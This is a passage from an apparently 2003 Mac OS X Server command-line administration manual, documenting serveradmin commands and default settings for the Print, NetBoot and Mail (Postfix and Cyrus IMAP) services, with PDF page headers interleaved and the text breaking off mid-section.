66F66AdA-060B-5603-9024-FCB57AAB24B1. LL2354.book Page 89 Monday, October 20, 2003 9:47 AM 90 Chapter 9 Working With Print Service Changing Print Service Settings To change a setting: $ sudo serveradmin settings print:setting = value To change several settings: $ sudo serveradmin settings print:setting = value print:setting = value print:setting = value [...] Control-D Print Service Settings Use the following parameters with the serveradmin command to change settings for the Print service. Parameter Description setting A Print service setting. To see a list of available settings, type $ sudo serveradmin settings print or see “Print Service Settings” on this page. value An appropriate value for the setting. Parameter (print:) Description serverLogArchiveIntervalDays Default = 7 <queue arrays> See “Queue Data Array” on page 91. serverLogArchiveEnable Default = no jobLogArchiveIntervalDays Default = 7 jobLogArchiveEnable Default = no LL2354.book Page 90 Monday, October 20, 2003 9:47 AM Chapter 9 Working With Print Service 91 Queue Data Array Print service settings include an array of values for each existing print queue. The array is a set of 14 parameters that define values for each queue. <id> is the queue ID, for example, 29D3ECF3-17C8-16E5-A330-84CEC733F249. Parameter (print:) Description queuesArray:_array_id:<id>: quotasEnforced Default = no queuesArray:_array_id:<id>: sharingList:_array_index:0: service Default = "LPR" queuesArray:_array_id:<id>: sharingList:_array_index:0: sharingEnable Default = no queuesArray:_array_id:<id>: sharingList:_array_index:1: service Default = "SMB" queuesArray:_array_id:<id>: sharingList:_array_index:1: sharingEnable Default = no queuesArray:_array_id:<id>: sharingList:_array_index:2: service Default = "PAP" queuesArray:_array_id:<id>: sharingList:_array_index:2: sharingEnable Default = no queuesArray:_array_id:<id>: shareable Default = yes. Cannot be changed. queuesArray:_array_id:<id>: defaultJobPriority Not used. Default = "NORMAL" queuesArray:_array_id:<id>: printerName Default = "<printer-name>" Cannot be changed using serveradmin. queuesArray:_array_id:<id>: defaultJobState Not used. Default = "PENDING" queuesArray:_array_id:<id>: printerURI Default = <uri> Format depends on type of printer. Cannot be changed using serveradmin. queuesArray:_array_id:<id>: registerRendezvous Default = yes queuesArray:_array_id:<id>: printerKind Default = "<type>" Cannot be changed using serveradmin. queuesArray:_array_id:<id>: sharingName Default = "<name>" LL2354.book Page 91 Monday, October 20, 2003 9:47 AM 92 Chapter 9 Working With Print Service Here is an example of a queue array parameter block: print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:quotasEnforced = no print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:0:service = "LPR" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:0:sharingEnable = no print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:1:service = "SMB" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:1:sharingEnable = no print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:2:service = "PAP" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:2:sharingEnable = no print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330-84CEC733F249:shareable = yes print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:defaultJobPriority = "NORMAL" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330-84CEC733F249:printerName = "Room 3 Printer" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:defaultJobState = "PENDING" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330-84CEC733F249:printerURI = "pap://*/Room%203%20Printer/LaserWriter" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:registerRendezvous = yes print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330-84CEC733F249:printerKind = "HP LaserJet 4100 Series " print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330-84CEC733F249:sharingName = "Room 3 Printer" LL2354.book Page 92 Monday, October 20, 2003 9:47 AM Chapter 9 Working With Print Service 93 Print Service serveradmin Commands You can use the following commands with the serveradmin application to manage Print service. Listing Queues You can use the serveradmin getQueues command to list Print service queues. $ sudo serveradmin command print:command = getQueues Pausing a Queue You can use the serveradmin setQueueState command to pause or release a queue. To pause a queue: $ sudo serveradmin command print:command = setQueueState print:status = PAUSED print:namesArray:_array_index:0 = queue Control-D To release the queue: $ sudo serveradmin command print:command = setQueueState print:status = "" print:namesArray:_array_index:0 = queue Control-D print:command= Description getJobs List information about the jobs waiting in a queue. See “Listing Jobs and Job Information” on page 94. getLogPaths Finding the locations of the Print service and job logs. See “Viewing Print Service Log Files” on page 95. getQueues List Print service queues. See “Listing Queues” on this page. setJobState Hold or release a job. See “Holding a Job” on page 94. setQueueState Pauses or release a queue. See “Pausing a Queue” on this page. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. Parameter Description queue The name of the queue. To find the name of the queue, use the getQueues command and look for the value of the print setting. See “Listing Queues” on this page. LL2354.book Page 93 Monday, October 20, 2003 9:47 AM 94 Chapter 9 Working With Print Service Listing Jobs and Job Information You can use the serveradmin getJobs command to list information about print jobs. $ sudo serveradmin command print:command = getJobs print:maxDisplayJobs = jobs print:queueNamesArray:_array_index:0 = queue Control-D For each job, the command lists: • Document name • Number of pages • Document size • Number of sheets • Job ID • Submitting user • Submitting host • Job name • Job state • Printing protocol • Job priority Holding a Job You can use the serveradmin setJobState command to hold or release a job. To hold a job: $ sudo serveradmin command print:command = setJobState print:status = HOLD print:namesArray:_array_index:0:printer = queue print:namesArray:_array_index:0:idsArray:_array_index:0 = jobid Control-D Parameter Description jobs The maximum number of jobs to list. queue The name of the queue. To find the name of the queue, use the getQueues command and look for the value of the print setting. See “Listing Queues” on page 93. Parameter Description queue The name of the queue. To find the name of the queue, use the getQueues command and look for the value of the print setting. See “Listing Queues” on page 93. jobid The ID of the job. To find the ID of the job, use the getJobs command and look for the value of the jobId setting. See “Listing Jobs and Job Information” on this page. LL2354.book Page 94 Monday, October 20, 2003 9:47 AM Chapter 9 Working With Print Service 95 To release the job for printing, change its state to PENDING. To release the job: $ sudo serveradmin command print:command = setJobState print:status = PENDING print:namesArray:_array_index:0:printer = queue print:namesArray:_array_index:0:idsArray:_array_index:0 = jobid Control-D Viewing Print Service Log Files You can use tail or any other file listing tool to view the contents of the Print service logs. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current logs are located. To display the log paths: $ sudo serveradmin command print:command = getLogPaths Output print:logPathsArray:_array_index:0:path = <service-log> print:logPathsArray:_array_index:0:name = SYSTEMLOG print:logPathsArray:_array_index:0:path = <job-log-0> print:logPathsArray:_array_index:0:path = <queue-name-0> print:logPathsArray:_array_index:0:path = <job-log-1> print:logPathsArray:_array_index:0:path = <queue-name-1> [...] print:logPathsArray:_array_index:0:path = <job-log-n> print:logPathsArray:_array_index:0:path = <queue-name-n> Value Description <service-log> The location of the primary Print service log. Default = /Library/Logs/PrintService/ PrintService.server.log <job-log-n> The location of the job log for the corresponding queue. Default = /Library/Logs/PrintService/ PrintService.<queue-name-n>.job.log <queue-name-n> The name of the queue. LL2354.book Page 95 Monday, October 20, 2003 9:47 AM LL2354.book Page 96 Monday, October 20, 2003 9:47 AM 10 97 10 Working With NetBoot Service Commands you can use to manage the NetBoot service in Mac OS X Server. Starting and Stopping NetBoot Service To start NetBoot service: $ sudo serveradmin start netboot If you get the following response: $ netboot:state = "STOPPED" $ netboot:status = 5000 you have not yet enabled NetBoot on any network port. To stop NetBoot service: $ sudo serveradmin stop netboot Checking NetBoot Service Status To see if NetBoot service is running: $ sudo serveradmin status netboot To see complete NetBoot status: $ sudo serveradmin fullstatus netboot Viewing NetBoot Settings To list all NetBoot service settings: $ sudo serveradmin settings netboot LL2354.book Page 97 Monday, October 20, 2003 9:47 AM 98 Chapter 10 Working With NetBoot Service Changing NetBoot Settings You can change NetBoot service settings using the serveradmin command. To change a setting: $ sudo serveradmin settings netboot:setting = value To change several settings: $ sudo serveradmin settings netboot:setting = value netboot:setting = value netboot:setting = value [...] Control-D NetBoot Service Settings General Settings Use the following parameters with the serveradmin command to change settings for the NetBoot service. Parameter Description setting A NetBoot service setting. To see a list of available settings, type $ sudo serveradmin settings netboot or see “NetBoot Service Settings” on this page. value An appropriate value for the setting. Parameter (netboot:) Description filterEnabled Specifies whether client filtering is enabled. Default = "No" netBootStorageRecordsArray... An array of values for each server volume used to store boot or install images. For a description, see “Storage Record Array” on page 99. netBootFiltersRecordsArray... An array of values for each computer explicitly allowed or disallowed access to images. For a description, see “Filters Record Array” on page 99. netBootImagesRecordsArray... An array of values for each boot or install image stored on the server. For a description, see “Image Record Array” on page 100. netBootPortsRecordsArray... An array of values for each server network port used to deliver boot or install images. For a description, see “Port Record Array” on page 101. LL2354.book Page 98 Monday, October 20, 2003 9:47 AM Chapter 10 Working With NetBoot Service 99 Storage Record Array A volume parameter array: Filters Record Array An array of the following values appears in the NetBoot service settings for each computer explicitly allowed or denied access to images stored on the server: Parameter (netboot:) Description netBootStorageRecordsArray:_array_index:<n>: sharepoint First parameter in an array describing a volume available to serve images. Default = "No" netBootStorageRecordsArray:_array_index:<n>: clients Default = "No" netBootStorageRecordsArray:_array_index:<n>: ignorePrivs Default = "false" netBootStorageRecordsArray:_array_index:<n>: volType Default = <voltype> Example: "hfs" netBootStorageRecordsArray:_array_index:<n>: path Default = "/" netBootStorageRecordsArray:_array_index:<n>: volName Default = <name> netBootStorageRecordsArray:_array_index:<n>: volIcon Default = <icon> netBootStorageRecordsArray:_array_index:<n>: okToDeleteClients Default = "Yes" netBootStorageRecordsArray:_array_index:<n>: okToDeleteSharepoint Default = "Yes" Parameter (netboot:) Description: netBootFiltersRecordsArray: _array_index:<n>:hostName The host name of the filtered computer, if available. netBootFiltersRecordsArray: _array_index:<n>:filterType Whether the specified computer is allowed or denied access. Options: "allow" "deny" netBootFiltersRecordsArray: _array_index:<n>:hardwareAddress The Ethernet hardware (MAC) address of the filtered computer. LL2354.book Page 99 Monday, October 20, 2003 9:47 AM 100 Chapter 10 Working With NetBoot Service Image Record Array An array of the following values appears in the NetBoot service settings for each image stored on the server: Parameter (netboot:) Description: netBootImagesRecordsArray: _array_index:<n>:Name Name of the image as it appears in the Startup Disk control panel (Mac OS 9) or Preferences pane (Mac OS X). netBootImagesRecordsArray: _array_index:<n>:IsDefault Yes specifies this image file as the default boot image on the subnet. netBootImagesRecordsArray: _array_index:<n>:RootPath The path to the .dmg file. netBootImagesRecordsArray: _array_index:<n>:isEdited netBootImagesRecordsArray: _array_index:<n>:BootFile Name of boot ROM file: booter. netBootImagesRecordsArray: _array_index:<n>:Description Arbitrary text describing the image. netBootImagesRecordsArray: _array_index:<n>:SupportsDiskless Yes directs the NetBoot server to allocate space for the shadow files needed by diskless clients. netBootImagesRecordsArray: _array_index:<n>:Type NFS or HTTP. netBootImagesRecordsArray: _array_index:<n>:pathToImage The path to the parameter list file in the .nbi folder on the server describing the image. netBootImagesRecordsArray: _array_index:<n>:Index 1–4095 indicates a local image unique to the server. 4096–65535 is a duplicate, identical image stored on multiple servers for load balancing. netBootImagesRecordsArray: _array_index:<n>:IsEnabled Sets whether the image is available to NetBoot (or Network Image) clients. netBootImagesRecordsArray: _array_index:<n>:IsInstall Yes specifies a Network Install image; False specifies a NetBoot image. LL2354.book Page 100 Monday, October 20, 2003 9:47 AM Chapter 10 Working With NetBoot Service 101 Port Record Array An array of the following items is included in the NetBoot service settings for each network port on the server set to deliver images: Parameter (netboot:) Description netBootPortsRecordsArray:_array_index:<m>: isEnabledAtIndex First parameter in an array describing a network interface available for responding to netboot requests. Default = "No" netBootPortsRecordsArray:_array_index:<m>: nameAtIndex Default = "<devname>" Example: "Built-in Ethernet" netBootPortsRecordsArray:_array_index:<m>: deviceAtIndex Default = "<dev>" Example: "en0" LL2354.book Page 101 Monday, October 20, 2003 9:47 AM LL2354.book Page 102 Monday, October 20, 2003 9:47 AM 11 103 11 Working With Mail Service Commands you can use to manage the Mail service in Mac OS X Server. Starting and Stopping Mail Service To start Mail service: $ sudo serveradmin start mail To stop Mail service: $ sudo serveradmin stop mail Checking the Status of Mail Service To see summary status of Mail service: $ sudo serveradmin status mail To see detailed status of Mail service: $ sudo serveradmin fullstatus mail Viewing Mail Service Settings To list Mail service configuration settings: $ sudo serveradmin settings mail To list a particular setting: $ sudo serveradmin settings mail:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example: $ sudo serveradmin settings mail:imap:* LL2354.book Page 103 Monday, October 20, 2003 9:47 AM 104 Chapter 11 Working With Mail Service Changing Mail Service Settings You can use serveradmin to modify your server’s mail configuration. However, if you want to work with the Mail service from the command-line, you’ll probably find it more straightforward to work directly with the underlying Postfix and Cyrus mail services. For information on Postfix, visit www.postfix.org. For information on Cyrus IMAP/POP, visit asg.web.cmu.edu/cyrus. You can also use Sherlock or Google to search the web for information on Postfix or Cyrus. Mail Service Settings Use the following parameters with the serveradmin command to change settings for the Mail service. Parameter (mail:) Description postfix:message_size_limit Default = 10240000 postfix:readme_directory Default = no postfix:double_bounce_sender Default = "double-bounce" postfix:default_recipient_limit Default = 10000 postfix:local_destination_recipient_limit Default = 1 postfix:queue_minfree Default = 0 postfix:show_user_unknown_table_name Default = yes postfix:default_process_limit Default = 100 postfix:export_environment Default = "TZ MAIL_CONFIG" postfix:smtp_line_length_limit Default = 990 postfix:smtp_rcpt_timeout Default = "300s" postfix:masquerade_domains Default = "" postfix:soft_bounce Default = no postfix:pickup_service_name Default = "pickup" postfix:config_directory Default = "/etc/postfix" postfix:smtpd_soft_error_limit Default = 10 postfix:undisclosed_recipients_header Default = "To: undisclosed- recipients:;" postfix:lmtp_lhlo_timeout Default = "300s" postfix:smtpd_recipient_restrictions Default = "permit_mynetworks,reject _unauth_destination" postfix:unknown_local_recipient_reject_code Default = 450 LL2354.book Page 104 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 105 postfix:error_notice_recipient Default = "postmaster" postfix:smtpd_sasl_local_domain Default = no postfix:strict_mime_encoding_domain Default = no postfix:unknown_relay_recipient_reject_code Default = 550 postfix:disable_vrfy_command Default = no postfix:unknown_virtual_mailbox_reject_code Default = 550 postfix:fast_flush_refresh_time Default = "12h" postfix:prepend_delivered_header Default = "command, file, forward" postfix:defer_service_name Default = "defer" postfix:sendmail_path Default = "/usr/sbin/sendmail" postfix:lmtp_sasl_password_maps Default = no postfix:smtp_sasl_password_maps Default = no postfix:qmgr_clog_warn_time Default = "300s" postfix:smtp_sasl_auth_enable Default = no postfix:smtp_skip_4xx_greeting Default = yes postfix:smtp_skip_5xx_greeting Default = yes postfix:stale_lock_time Default = "500s" postfix:strict_8bitmime_body Default = no postfix:disable_mime_input_processing Default = no postfix:smtpd_hard_error_limit Default = 20 postfix:empty_address_recipient Default = "MAILER-DAEMON" postfix:forward_expansion_filter Default = "1234567890!@%- _=+:,./abcdefghijklmnopqr stuvwxyzABCDEFGHIJKLMNOPQ RSTUVWXYZ" postfix:smtpd_expansion_filter Default = "\t\40!"#$%&'()*+,- ./0123456789:;<=>?@ABCDEF GHIJKLMNOPQRSTUVWXYZ[\\]^ _`abcdefghijklmnopqrstuvw xyz{|}~" postfix:relayhost Default = "" postfix:defer_code Default = 450 postfix:lmtp_rset_timeout Default = "300s" postfix:always_bcc Default = "" postfix:proxy_interfaces Default = "" postfix:maps_rbl_reject_code Default = 554 Parameter (mail:) Description LL2354.book Page 105 Monday, October 20, 2003 9:47 AM 106 Chapter 11 Working With Mail Service postfix:line_length_limit Default = 2048 postfix:mailbox_transport Default = 0 postfix:deliver_lock_delay Default = "1s" postfix:best_mx_transport Default = 0 postfix:notify_classes Default = "resource,software" postfix:mailbox_command Default = "" postfix:mydomain Default = <domain> postfix:mailbox_size_limit Default = 51200000 postfix:default_verp_delimiters Default = "+=" postfix:resolve_dequoted_address Default = yes postfix:cleanup_service_name Default = "cleanup" postfix:header_address_token_limit Default = 10240 postfix:lmtp_connect_timeout Default = "0s" postfix:strict_7bit_headers Default = no postfix:unknown_hostname_reject_code Default = 450 postfix:virtual_alias_domains Default = "$virtual_alias_maps" postfix:lmtp_sasl_auth_enable Default = no postfix:queue_directory Default = "/private/var/ spool/postfix" postfix:sample_directory Default = "/usr/share/doc/ postfix/examples" postfix:fallback_relay Default = 0 postfix:smtpd_use_pw_server Default = "yes" postfix:smtpd_sasl_auth_enable Default = no postfix:mail_owner Default = "postfix" postfix:command_time_limit Default = "1000s" postfix:verp_delimiter_filter Default = "-=+" postfix:qmqpd_authorized_clients Default = 0 postfix:virtual_mailbox_base Default = "" postfix:permit_mx_backup_networks Default = "" postfix:queue_run_delay Default = "1000s" postfix:virtual_mailbox_domains Default = "$virtual_mailbox_maps" postfix:local_destination_concurrency_limit Default = 2 postfix:daemon_timeout Default = "18000s" Parameter (mail:) Description LL2354.book Page 106 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 107 postfix:local_transport Default = "local:$myhostname" postfix:smtpd_helo_restrictions Default = no postfix:fork_delay Default = "1s" postfix:disable_mime_output_conversion Default = no postfix:mynetworks:_array_index:0 Default = "127.0.0.1/32" postfix:smtp_never_send_ehlo Default = no postfix:lmtp_cache_connection Default = yes postfix:local_recipient_maps Default = "proxy:unix:passwd.byname $alias_maps" postfix:smtpd_timeout Default = "300s" postfix:require_home_directory Default = no postfix:smtpd_error_sleep_time Default = "1s" postfix:helpful_warnings Default = yes postfix:mail_spool_directory Default = "/var/mail" postfix:mailbox_delivery_lock Default = "flock" postfix:disable_dns_lookups Default = no postfix:mailbox_command_maps Default = "" postfix:default_destination_concurrency _limit Default = 20 postfix:2bounce_notice_recipient Default = "postmaster" postfix:virtual_alias_maps Default = "$virtual_maps" postfix:mailq_path Default = "/usr/bin/mailq" postfix:recipient_delimiter Default = no postfix:masquerade_exceptions Default = "" postfix:delay_notice_recipient Default = "postmaster" postfix:smtp_helo_name Default = "$myhostname" postfix:flush_service_name Default = "flush" postfix:service_throttle_time Default = "60s" postfix:import_environment Default = "MAIL_CONFIG MAIL_DEBUG MAIL_LOGTAG TZ XAUTHORITY DISPLAY" postfix:sun_mailtool_compatibility Default = no postfix:authorized_verp_clients Default = "$mynetworks" postfix:debug_peer_list Default = "" postfix:mime_boundary_length_limit Default = 2048 postfix:initial_destination_concurrency Default = 5 Parameter (mail:) Description LL2354.book Page 107 Monday, October 20, 2003 9:47 AM 108 Chapter 11 Working With Mail Service postfix:parent_domain_matches_subdomains Default = "debug_peer_list,fast_flu sh_domains,mynetworks,per mit_mx_backup_networks,qm qpd_authorized_clients,re lay_domains,smtpd_access_ maps" postfix:setgid_group Default = "postdrop" postfix:mime_header_checks Default = "$header_checks" postfix:smtpd_etrn_restrictions Default = "" postfix:relay_transport Default = "relay" postfix:inet_interfaces Default = "localhost" postfix:smtpd_sender_restrictions Default = "" postfix:delay_warning_time Default = "0h" postfix:alias_maps Default = "hash:/etc/aliases" postfix:sender_canonical_maps Default = "" postfix:trigger_timeout Default = "10s" postfix:newaliases_path Default = "/usr/bin/newaliases" postfix:default_rbl_reply Default = "$rbl_code Service unavailable; $rbl_class [$rbl_what] blocked using $rbl_domain${rbl_reason?; $rbl_reason}" postfix:alias_database Default = "hash:/etc/aliases" postfix:qmgr_message_recipient_limit Default = 20000 postfix:extract_recipient_limit Default = 10240 postfix:header_checks Default = 0 postfix:syslog_facility Default = "mail" postfix:luser_relay Default = "" postfix:maps_rbl_domains:_array_index:0 Default = "" postfix:deliver_lock_attempts Default = 20 postfix:smtpd_data_restrictions Default = "" postfix:smtpd_pw_server_security_options: _array_index:0 Default = "none" postfix:ipc_idle Default = "100s" postfix:mail_version Default = "2.0.7" postfix:transport_retry_time Default = "60s" Parameter (mail:) Description LL2354.book Page 108 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 109 postfix:virtual_mailbox_limit Default = 51200000 postfix:smtpd_noop_commands Default = 0 postfix:mail_release_date Default = "20030319" postfix:append_at_myorigin Default = yes postfix:body_checks_size_limit Default = 51200 postfix:qmgr_message_active_limit Default = 20000 postfix:mail_name Default = "Postfix" postfix:masquerade_classes Default = "envelope_sender, header_sender, header_recipient" postfix:allow_min_user Default = no postfix:smtp_randomize_addresses Default = yes postfix:alternate_config_directories Default = no postfix:allow_percent_hack Default = yes postfix:process_id_directory Default = "pid" postfix:strict_rfc821_envelopes Default = no postfix:fallback_transport Default = 0 postfix:owner_request_special Default = yes postfix:default_transport Default = "smtp" postfix:biff Default = yes postfix:relay_domains_reject_code Default = 554 postfix:smtpd_delay_reject Default = yes postfix:lmtp_quit_timeout Default = "300s" postfix:lmtp_mail_timeout Default = "300s" postfix:fast_flush_purge_time Default = "7d" postfix:disable_verp_bounces Default = no postfix:lmtp_skip_quit_response Default = no postfix:daemon_directory Default = "/usr/libexec/postfix" postfix:default_destination_recipient_limit Default = 50 postfix:smtp_skip_quit_response Default = yes postfix:smtpd_recipient_limit Default = 1000 postfix:virtual_gid_maps Default = "" postfix:duplicate_filter_limit Default = 1000 postfix:rbl_reply_maps Default = "" postfix:relay_recipient_maps Default = 0 postfix:syslog_name Default = "postfix" Parameter (mail:) Description LL2354.book Page 109 Monday, October 20, 2003 9:47 AM 110 Chapter 11 Working With Mail Service postfix:queue_service_name Default = "qmgr" postfix:transport_maps Default = "" postfix:smtp_destination_concurrency_limit Default = "$default_destination_con currency_limit" postfix:virtual_mailbox_lock Default = "fcntl" postfix:qmgr_fudge_factor Default = 100 postfix:ipc_timeout Default = "3600s" postfix:default_delivery_slot_discount Default = 50 postfix:relocated_maps Default = "" postfix:max_use Default = 100 postfix:default_delivery_slot_cost Default = 5 postfix:default_privs Default = "nobody" postfix:smtp_bind_address Default = no postfix:nested_header_checks Default = "$header_checks" postfix:canonical_maps Default = no postfix:debug_peer_level Default = 2 postfix:in_flow_delay Default = "1s" postfix:smtpd_junk_command_limit Default = 100 postfix:program_directory Default = "/usr/libexec/postfix" postfix:smtp_quit_timeout Default = "300s" postfix:smtp_mail_timeout Default = "300s" postfix:minimal_backoff_time Default = "1000s" postfix:queue_file_attribute_count_limit Default = 100 postfix:body_checks Default = no postfix:smtpd_client_restrictions: _array_index:0 Default = "" postfix:mydestination:_array_index:0 Default = "$myhostname" postfix:mydestination:_array_index:1 Default = "localhost.$mydomain" postfix:error_service_name Default = "error" postfix:smtpd_sasl_security_options: _array_index:0 Default = "noanonymous" postfix:smtpd_null_access_lookup_key Default = "<>" postfix:virtual_uid_maps Default = "" postfix:smtpd_history_flush_threshold Default = 100 postfix:smtp_pix_workaround_threshold_time Default = "500s" Parameter (mail:) Description LL2354.book Page 110 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 111 postfix:showq_service_name Default = "showq" postfix:smtp_pix_workaround_delay_time Default = "10s" postfix:lmtp_sasl_security_options Default = "noplaintext, noanonymous" postfix:bounce_size_limit Default = 50000 postfix:qmqpd_timeout Default = "300s" postfix:allow_mail_to_files Default = "alias,forward" postfix:relay_domains Default = "$mydestination" postfix:smtpd_banner Default = "$myhostname ESMTP $mail_name" postfix:smtpd_helo_required Default = no postfix:berkeley_db_read_buffer_size Default = 131072 postfix:swap_bangpath Default = yes postfix:maximal_queue_lifetime Default = "5d" postfix:ignore_mx_lookup_error Default = no postfix:mynetworks_style Default = "host" postfix:myhostname Default = "<hostname>" postfix:default_minimum_delivery_slots Default = 3 postfix:recipient_canonical_maps Default = no postfix:hash_queue_depth Default = 1 postfix:hash_queue_names:_array_index:0 Default = "incoming" postfix:hash_queue_names:_array_index:1 Default = "active" postfix:hash_queue_names:_array_index:2 Default = "deferred" postfix:hash_queue_names:_array_index:3 Default = "bounce" postfix:hash_queue_names:_array_index:4 Default = "defer" postfix:hash_queue_names:_array_index:5 Default = "flush" postfix:hash_queue_names:_array_index:6 Default = "hold" postfix:lmtp_tcp_port Default = 24 postfix:local_command_shell Default = 0 postfix:allow_mail_to_commands Default = "alias,forward" postfix:non_fqdn_reject_code Default = 504 postfix:maximal_backoff_time Default = "4000s" postfix:smtp_always_send_ehlo Default = yes Parameter (mail:) Description LL2354.book Page 111 Monday, October 20, 2003 9:47 AM 112 Chapter 11 Working With Mail Service postfix:proxy_read_maps Default = "$local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks" postfix:propagate_unmatched_extensions Default = "canonical, virtual" postfix:smtp_destination_recipient_limit Default = "$default_destination_ recipient_limit" postfix:smtpd_restriction_classes Default = "" postfix:mime_nesting_limit Default = 100 postfix:virtual_mailbox_maps Default = "" postfix:bounce_service_name Default = "bounce" postfix:header_size_limit Default = 102400 postfix:strict_8bitmime Default = no postfix:virtual_transport Default = "virtual" postfix:berkeley_db_create_buffer_size Default = 16777216 postfix:broken_sasl_auth_clients Default = no postfix:home_mailbox Default = no postfix:content_filter Default = "" postfix:forward_path Default = "$home/.forward${recipien t_delimiter}${extension}, $home/.forward" postfix:qmqpd_error_delay Default = "1s" postfix:manpage_directory Default = "/usr/share/man" postfix:hopcount_limit Default = 50 postfix:unknown_virtual_alias_reject_code Default = 550 postfix:smtpd_sender_login_maps Default = "" postfix:rewrite_service_name Default = "rewrite" postfix:unknown_address_reject_code Default = 450 Parameter (mail:) Description LL2354.book Page 112 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 113 postfix:append_dot_mydomain Default = yes postfix:command_expansion_filter Default = "1234567890!@%- _=+:,./abcdefghijklmnopqr stuvwxyzABCDEFGHIJKLMNOPQ RSTUVWXYZ" postfix:default_extra_recipient_limit Default = 1000 postfix:lmtp_data_done_timeout Default = "600s" postfix:myorigin Default = "$myhostname" postfix:lmtp_data_init_timeout Default = "120s" postfix:lmtp_data_xfer_timeout Default = "180s" postfix:smtp_data_done_timeout Default = "600s" postfix:smtp_data_init_timeout Default = "120s" postfix:smtp_data_xfer_timeout Default = "180s" postfix:default_delivery_slot_loan Default = 3 postfix:reject_code Default = 554 postfix:command_directory Default = "/usr/sbin" postfix:lmtp_rcpt_timeout Default = "300s" postfix:smtp_sasl_security_options Default = "noplaintext, noanonymous" postfix:access_map_reject_code Default = 554 postfix:smtp_helo_timeout Default = "300s" postfix:bounce_notice_recipient Default = "postmaster" postfix:smtp_connect_timeout Default = "30s" postfix:fault_injection_code Default = 0 postfix:unknown_client_reject_code Default = 450 postfix:virtual_minimum_uid Default = 100 postfix:fast_flush_domains Default = "$relay_domains" postfix:default_database_type Default = "hash" postfix:dont_remove Default = 0 postfix:expand_owner_alias Default = no postfix:max_idle Default = "100s" postfix:defer_transports Default = "" postfix:qmgr_message_recipient_minimum Default = 10 postfix:invalid_hostname_reject_code Default = 501 postfix:fork_attempts Default = 5 postfix:allow_untrusted_routing Default = no imap:tls_cipher_list:_array_index:0 Default = "DEFAULT" Parameter (mail:) Description LL2354.book Page 113 Monday, October 20, 2003 9:47 AM 114 Chapter 11 Working With Mail Service imap:umask Default = "077" imap:tls_ca_path Default = "" imap:pop_auth_gssapi Default = yes imap:sasl_minimum_layer Default = 0 imap:tls_cert_file Default = "" imap:poptimeout Default = 10 imap:tls_sieve_require_cert Default = no imap:mupdate_server Default = "" imap:timeout Default = 30 imap:quotawarn Default = 90 imap:enable_pop Default = no imap:mupdate_retry_delay Default = 20 imap:tls_session_timeout Default = 1440 imap:postmaster Default = "postmaster" imap:defaultacl Default = "anyone lrs" imap:tls_lmtp_key_file Default = "" imap:newsprefix Default = "" imap:userprefix Default = "Other Users" imap:deleteright Default = "c" imap:allowplaintext Default = yes imap:pop_auth_clear Default = no imap:imapidresponse Default = yes imap:sasl_auto_transition Default = no imap:mupdate_port Default = "" imap:admins:_array_index:0 Default = "cyrus" imap:plaintextloginpause Default = 0 imap:popexpiretime Default = 0 imap:pop_auth_any Default = no imap:sieve_maxscriptsize Default = 32 imap:hashimapspool Default = no imap:tls_lmtp_cert_file Default = "" imap:tls_sieve_key_file Default = "" imap:sievedir Default = "/usr/sieve" imap:debug_command Default = "" imap:popminpoll Default = 0 imap:tls_lmtp_require_cert Default = no Parameter (mail:) Description LL2354.book Page 114 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 115 imap:tls_ca_file Default = "" imap:sasl_pwcheck_method Default = "auxprop" imap:postuser Default = "" imap:sieve_maxscripts Default = 5 imap:defaultpartition Default = "default" imap:altnamespace Default = yes imap:max_imap_connections Default = 100 imap:tls_imap_cert_file Default = "" imap:sieveusehomedir Default = no imap:reject8bit Default = no imap:tls_sieve_cert_file Default = "" imap:imapidlepoll Default = 60 imap:srvtab Default = "/etc/srvtab" imap:imap_auth_login Default = no imap:tls_pop3_cert_file Default = "" imap:tls_pop3_require_cert Default = no imap:lmtp_overquota_perm_failure Default = no imap:tls_imap_key_file Default = "" imap:enable_imap Default = no imap:tls_require_cert Default = no imap:autocreatequota Default = 0 imap:allowanonymouslogin Default = no imap:pop_auth_apop Default = yes imap:partition-default Default = "/var/spool/imap" imap:imap_auth_cram_md5 Default = no imap:mupdate_password Default = "" imap:idlesocket Default = "/var/imap/socket/idle" imap:allowallsubscribe Default = no imap:singleinstancestore Default = yes imap:unixhierarchysep Default = "yes" imap:mupdate_realm Default = "" imap:sharedprefix Default = "Shared Folders" imap:tls_key_file Default = "" imap:lmtpsocket Default = "/var/imap/socket/lmtp" Parameter (mail:) Description LL2354.book Page 115 Monday, October 20, 2003 9:47 AM 116 Chapter 11 Working With Mail Service Mail serveradmin Commands You can use the following commands with the serveradmin application to manage Mail service. imap:configdirectory 